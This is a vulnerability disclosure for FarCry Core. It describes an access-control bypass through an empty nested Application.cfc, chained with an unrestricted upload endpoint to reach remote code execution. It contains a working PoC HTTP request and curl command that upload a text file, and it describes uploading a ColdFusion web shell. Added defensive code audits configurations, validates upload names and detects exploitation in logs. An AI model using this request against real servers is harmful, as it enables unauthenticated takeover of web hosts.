Introduction

During an engagement, David Sunley, Jim Rush, Jack Moran, and Michael Tsai discovered two critical vulnerabilities in FarCry Core, an open-source web application framework designed to be used with ColdFusion. Due to a broken access control issue, unauthenticated users can access sensitive functionality and data, including unrestricted file upload functionality. Chaining these issues together, an attacker could write arbitrary files to disk and perform remote code execution on the underlying web server from an unauthenticated perspective (in FarCry’s default configuration).

Vulnerability Discovery

Broken Access Control

The /farcry/core/webtop/Application.cfc file contains the following method to check whether a user making a request to any file or directory inside of the /webtop directory is authorised to do so:

<cfimport taglib="/farcry/core/tags/security" prefix="sec" />

<cfif not findNoCase( "login.cfm", cgi.script_name )>
  <!--- If the user is not logged in, then they are redirected to the login page with no message --->
  <sec:checkLoggedIn url="#arguments.targetPage#?#cgi.query_string#" />

  <!--- If the user is logged in but does not have the admin permission, then they are redirected with a message --->
  <sec:checkLoggedIn url="#arguments.targetPage#?#cgi.query_string#" lPermissions="admin" message="You do not have permission to access the webtop" />
</cfif>

However, inside of the /webtop directory is a /facade directory that contains its own Application.cfc file:

<cfcomponent extends="farcry.core.proxyApplication" displayname="Application" output="true" hint="Handle the application.">

</cfcomponent>

Since this file is essentially empty, the webtop security check that is expected to happen on any request to /webtop is effectively removed, allowing any unauthorised user to access files within /facade.
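The root cause is a property of ColdFusion itself: a request is governed by the first Application.cfc found when walking up from the requested file's directory, so a subdirectory component that defines no request hook replaces the parent's onRequestStart() check with nothing. The following script is an added example (not FarCry's code, and not part of the original advisory) that audits a web root for exactly this pattern: it lists every Application.cfc, records which request hooks each one defines and what it extends, and flags nested components that define no hook while an ancestor does. The FarCry-like directory tree it builds in a temporary directory is constructed for the example.

```python
"""Audit a ColdFusion web root for nested Application.cfc files that silently
shadow an ancestor's per-request security check.

Added example, not FarCry's code. The sample tree built by build_sample_tree()
is constructed to mirror the layout described in the advisory.
"""
import re
import tempfile
from pathlib import Path

# Request-scoped lifecycle methods; a component defining one of these performs
# (or at least has the chance to perform) its own per-request access control.
REQUEST_HOOKS = ("onRequestStart", "onRequest")

# Tag-based and script-based function declarations. \bname avoids matching the
# "displayname" attribute.
HOOK_RE = re.compile(r'<cffunction\s+[^>]*\bname\s*=\s*"(?P<name>[A-Za-z_]+)"', re.IGNORECASE)
SCRIPT_HOOK_RE = re.compile(r'\bfunction\s+(?P<name>[A-Za-z_]+)\s*\(', re.IGNORECASE)
EXTENDS_RE = re.compile(r'\bextends\s*=\s*"(?P<base>[^"]+)"', re.IGNORECASE)


def describe_component(path: Path) -> dict:
    """Return the request hooks an Application.cfc defines and what it extends."""
    text = path.read_text(encoding="utf-8", errors="replace")
    names = {m.group("name").lower() for m in HOOK_RE.finditer(text)}
    names |= {m.group("name").lower() for m in SCRIPT_HOOK_RE.finditer(text)}
    hooks = sorted(h for h in REQUEST_HOOKS if h.lower() in names)
    ext = EXTENDS_RE.search(text)
    return {"path": path, "hooks": hooks, "extends": ext.group("base") if ext else None}


def find_shadowing_components(webroot: str) -> list:
    """Report nested Application.cfc files that define no request hook while an
    ancestor Application.cfc does; every file under such a directory is served
    without the ancestor's check."""
    root = Path(webroot).resolve()
    components = {p.parent: describe_component(p) for p in root.rglob("Application.cfc")}
    findings = []
    for directory, info in components.items():
        if info["hooks"]:
            continue  # defines its own hook: review by hand, but not a silent bypass
        for ancestor in directory.parents:
            if ancestor != root and root not in ancestor.parents:
                break  # walked above the web root
            parent = components.get(ancestor)
            if parent and parent["hooks"]:
                findings.append({
                    "shadowing": directory.relative_to(root).as_posix(),
                    "shadowed": ancestor.relative_to(root).as_posix(),
                    "lost_hooks": parent["hooks"],
                    "extends": info["extends"],
                })
                break
    return sorted(findings, key=lambda f: f["shadowing"])


def build_sample_tree() -> str:
    """Write a constructed FarCry-like layout to a temp dir and return its path."""
    base = Path(tempfile.mkdtemp(prefix="cfaudit_"))
    webtop = base / "farcry" / "core" / "webtop"
    (webtop / "facade" / "fileupload").mkdir(parents=True)
    # Parent component: applies the webtop login/permission check per request.
    (webtop / "Application.cfc").write_text(
        '<cfcomponent extends="farcry.core.proxyApplication">\n'
        '  <cffunction name="onRequestStart">\n'
        '    <cfargument name="targetPage" />\n'
        '    <sec:checkLoggedIn url="#arguments.targetPage#" lPermissions="admin" />\n'
        '  </cffunction>\n'
        '</cfcomponent>\n'
    )
    # Nested component as quoted in the advisory: extends the proxy, defines nothing.
    (webtop / "facade" / "Application.cfc").write_text(
        '<cfcomponent extends="farcry.core.proxyApplication" displayname="Application" output="true">\n'
        '</cfcomponent>\n'
    )
    (webtop / "facade" / "fileupload" / "upload.cfm").write_text("<!--- upload handler --->\n")
    return str(base)


if __name__ == "__main__":
    for f in find_shadowing_components(build_sample_tree()):
        print(f"{f['shadowing']} shadows {f['shadowed']} (loses {', '.join(f['lost_hooks'])})")
```

On the sample tree the script reports that farcry/core/webtop/facade shadows farcry/core/webtop and loses onRequestStart. Run against a real web root, each finding is a directory to check by hand: either the nested component should re-apply the parent's check, or it should extend the parent component rather than a base class that knows nothing about the webtop.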

Unrestricted file upload

Within /facade is the /fileupload/upload.cfm file. This file does what it says on the tin, and is designed to be run as part of a form a developer has created. This file can be directly accessed through the browser, however. Due to the verbose nature of FarCry’s error messages that indicate exactly which URL parameters the upload.cfm file is expecting (typename, property, fieldname, and current), an HTTP request can be incrementally constructed that performs a valid file upload to whichever destination directory is declared in the request. The following screenshot shows the upload.cfm page and its verbose error messages:

Screenshot of verbose FarCry error messages.

Furthermore, despite file upload allowlists being defined in several places throughout FarCry, none are applied to /fileupload/upload.cfm. The following screenshot shows a ColdFusion webshell (shell.cfm) being successfully uploaded to the /files/dmfile directory:

Screenshot of ColdFusion web shell upload.

Navigate to /files/dmfile/shell.cfm, et voilà.
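The second issue is that none of FarCry's upload allowlists are applied to /fileupload/upload.cfm. As an added example (not FarCry's code, and not a reconstruction of upload.cfm), the following shows the server-side filename validation a practitioner would expect at such an endpoint: the client-supplied name is reduced to a bare file name, every extension in it is checked against a small allowlist so that names like shell.cfm.txt are refused, and the name the file is stored under is generated by the server rather than taken from the request. The allowlist contents are an assumption for the example.

```python
"""Server-side allowlist validation for an upload handler.

Added example; not FarCry's code. ALLOWED_EXTENSIONS is an assumed allowlist.
Every dot-separated extension is checked, not just the last one, so a
ColdFusion template extension anywhere in the name is rejected.
"""
import re
import secrets
import unicodedata

ALLOWED_EXTENSIONS = {"txt", "pdf", "png", "jpg", "jpeg", "gif"}  # assumed allowlist
SAFE_BASENAME_RE = re.compile(r"^[A-Za-z0-9._-]{1,100}$")


def sanitize_client_filename(raw: str) -> str:
    """Reduce a client-supplied filename to its final path component."""
    name = unicodedata.normalize("NFKC", raw).replace("\x00", "")
    name = name.replace("\\", "/").rsplit("/", 1)[-1]  # drop any directory part
    return name.strip().rstrip(". ")  # Windows ignores trailing dots and spaces


def validate_upload_name(raw: str):
    """Return (True, canonical_extension) or (False, reason)."""
    name = sanitize_client_filename(raw)
    if not name or name in (".", "..") or not SAFE_BASENAME_RE.match(name):
        return False, "invalid filename"
    parts = name.lower().split(".")
    if len(parts) < 2 or not parts[0]:
        return False, "missing extension"  # also rejects dotfiles such as .htaccess
    for ext in parts[1:]:
        if ext not in ALLOWED_EXTENSIONS:
            return False, f"extension not allowed: {ext}"
    return True, parts[-1]


def storage_name(raw: str) -> str:
    """Name to store the file under: random, server-chosen, allowlisted extension."""
    ok, result = validate_upload_name(raw)
    if not ok:
        raise ValueError(result)
    return f"{secrets.token_hex(16)}.{result}"


if __name__ == "__main__":
    for candidate in ("poc.txt", "shell.cfm", "shell.cfm.txt", "..\\..\\shell.cfm",
                      "shell.cfm\x00.txt", "photo.JPG", ".htaccess"):
        print(repr(candidate), "->", validate_upload_name(candidate))
```

Two design points matter here. Checking every extension rather than only the last closes the shell.cfm.txt and NUL-byte variants in one rule, at the cost of refusing a few legitimate names. Generating the stored name on the server means the client never controls what ends up on disk, so the allowlist is the only place the decision is made. Neither replaces the missing authentication check on the endpoint; both assume it is in place.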

PoC

The following is an example request that uploads a simple text file (poc.txt) to the /files/dmfile/ directory:

POST /farcry/core/webtop/facade/fileupload/upload.cfm?typename=dmFile&property=filename&fieldname=form-data&current= HTTP/1.1
Host: host
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIo7Vi06BQG9DDtyq
Connection: close
Content-Length: 301

------WebKitFormBoundaryIo7Vi06BQG9DDtyq
Content-Disposition: form-data; name="filedata"; filename="txt"
Content-Type: text/html

Reproduction proof-of-concept.

------WebKitFormBoundaryIo7Vi06BQG9DDtyq
Content-Disposition: form-data; name="filename"

poc.txt
------WebKitFormBoundaryIo7Vi06BQG9DDtyq--

Alternatively, the following cURL command can be used to perform the same file upload:

curl -i -s -k -X $'POST' \
    -H $'Host: host' -H $'Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIo7Vi06BQG9DDtyq' -H $'Connection: close' -H $'Content-Length: 301' \
    --data-binary $'------WebKitFormBoundaryIo7Vi06BQG9DDtyq\x0d\x0aContent-Disposition: form-data; name=\"filedata\"; filename=\"txt\"\x0d\x0aContent-Type: text/html\x0d\x0a\x0d\x0aReproduction proof-of-concept.\x0d\x0a\x0d\x0a------WebKitFormBoundaryIo7Vi06BQG9DDtyq\x0d\x0aContent-Disposition: form-data; name=\"filename\"\x0d\x0a\x0d\x0apoc.txt\x0d\x0a------WebKitFormBoundaryIo7Vi06BQG9DDtyq--' \
    $'https://host/farcry/core/webtop/facade/fileupload/upload.cfm?typename=dmFile&property=filename&fieldname=form-data&current='
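From a defender's side, the request above leaves a recognisable trace in ordinary web server access logs. The following is an added example (not part of the advisory) of detection logic over combined-format access log lines. It raises a review alert for any direct request to the facade upload handler, which the advisory notes is meant to be reached only from a webtop form, and escalates when the same client then requests a ColdFusion template (.cfm, .cfc or .cfml) under the /files/ upload destination within a short window, which is how an uploaded template would be executed. The log lines, client addresses and timestamps are constructed for the example.

```python
"""Detection over web server access logs for the FarCry upload.cfm abuse pattern.

Added example, not part of the advisory. Assumes Apache-style combined log
format. The sample lines in SAMPLE_LOG_LINES are constructed.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

UPLOAD_ENDPOINT = "/farcry/core/webtop/facade/fileupload/upload.cfm"
UPLOAD_DEST_PREFIX = "/files/"            # destination directory named in the advisory
EXEC_EXTENSIONS = (".cfm", ".cfc", ".cfml")
CORRELATION_WINDOW = timedelta(minutes=10)

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample: one benign download, one direct hit on the upload handler,
# a follow-up request for a template under /files/ from the same client, and an
# unrelated template request from another client with no preceding upload.
SAMPLE_LOG_LINES = [
    '198.51.100.20 - - [10/Oct/2023:14:01:50 +0000] "GET /files/dmfile/report.pdf HTTP/1.1" 200 88211 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Oct/2023:14:02:11 +0000] "POST /farcry/core/webtop/facade/fileupload/upload.cfm?typename=dmFile&property=filename&fieldname=form-data&current= HTTP/1.1" 200 512 "-" "curl/8.0.1"',
    '203.0.113.7 - - [10/Oct/2023:14:02:13 +0000] "GET /files/dmfile/shell.cfm HTTP/1.1" 200 128 "-" "curl/8.0.1"',
    '198.51.100.9 - - [10/Oct/2023:14:30:00 +0000] "GET /files/dmfile/old.cfm HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
]


def parse_line(line: str):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, _, query = m.group("target").partition("?")
    return {
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z"),
        "method": m.group("method"),
        "path": path,
        "query": query,
        "status": int(m.group("status")),
    }


def detect(lines) -> list:
    """Return alerts in log order. Severity: review (direct upload handler hit),
    high (template requested under /files/), critical (template requested under
    /files/ shortly after an upload handler hit from the same client)."""
    upload_hits = defaultdict(list)  # client ip -> timestamps of upload.cfm requests
    alerts = []
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        path = ev["path"].lower()
        if path == UPLOAD_ENDPOINT:
            upload_hits[ev["ip"]].append(ev["ts"])
            alerts.append({"severity": "review", "ip": ev["ip"], "ts": ev["ts"], "path": ev["path"],
                           "reason": "direct request to facade upload handler", "query": ev["query"]})
        elif path.startswith(UPLOAD_DEST_PREFIX) and path.endswith(EXEC_EXTENSIONS):
            recent = [t for t in upload_hits[ev["ip"]] if timedelta(0) <= ev["ts"] - t <= CORRELATION_WINDOW]
            alerts.append({"severity": "critical" if recent else "high", "ip": ev["ip"], "ts": ev["ts"],
                           "path": ev["path"], "reason": "ColdFusion template requested under upload directory",
                           "preceding_uploads": len(recent)})
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_LOG_LINES):
        print(f"[{a['severity']:>8}] {a['ts'].isoformat()} {a['ip']} {a['path']} - {a['reason']}")
```

Any template request under /files/ is worth an alert on its own, since an upload directory has no reason to serve .cfm files; the correlation with an upload.cfm hit from the same client only sets the priority. In production the same two rules map directly onto a SIEM query, and the direct-hit rule can be tightened to requests without a valid webtop session once the logging layer records it.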

Potential Impact

Unauthenticated remote code execution.

How To Fix

Upgrade to the latest version of FarCry Core (7.2.14).

Acknowledgements

Thanks again to Jim, Jack, and Michael for their collaboration on this <3

Vulnerability Disclosure Timeline

  • 18/10/2023 - Issues disclosed to vendor
  • 18/10/2023 - Vendor response
  • 27/10/2023 - Bugs patched by vendor, master branch is up to date
  • 28/10/2023 - Asked vendor when packaged release will be rolled out, no response
  • 14/11/2023 - Requesting update from vendor
  • 14/11/2023 - Vendor responds, packaged release happening soon
  • 20/03/2024 - Requesting update from vendor, no response
  • 01/05/2024 - Contacted vendor to indicate that the vulnerabilities will be publicly disclosed since the FarCry Core master branch is up to date, despite no packaged releases
  • 02/05/2024 - Vendor responds, limited bandwidth for packaged release process
  • 29/05/2024 - CVEs assigned - CVE-2024-35526 (broken access control), CVE-2024-35527 (unrestricted file upload)
  • 31/05/2024 - Advisory published
